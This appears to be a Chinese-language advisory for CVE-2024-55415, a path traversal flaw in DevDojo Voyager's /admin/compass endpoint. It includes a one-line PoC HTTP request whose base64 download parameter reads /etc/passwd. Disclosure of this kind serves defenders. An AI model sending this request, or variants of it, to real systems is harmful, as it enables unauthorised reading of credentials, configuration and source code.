DevDojo Voyager /admin/compass 文件读取漏洞(CVE-2024-55415)

2026-03-27 DevDojo Voyager PoC Public

Description

DevDojo Voyager 是一款基于 Laravel 框架开发的后台管理面板,提供图形化界面以简化数据库管理、菜单构建等任务。其1.8.0及之前版本中的 /admin/compass 接口存在路径遍历漏洞,由于对用户提供的 base64 编码文件名参数未进行充分过滤,导致已认证的攻击者可利用此缺陷读取服务器上的任意文件。此漏洞利用门槛低,可直接窃取系统配置文件、数据库凭证、应用程序源码等核心敏感数据,对业务系统构成严重威胁。

PoC

GET /admin/compass?download=L2V0Yy9wYXNzd2Q= HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities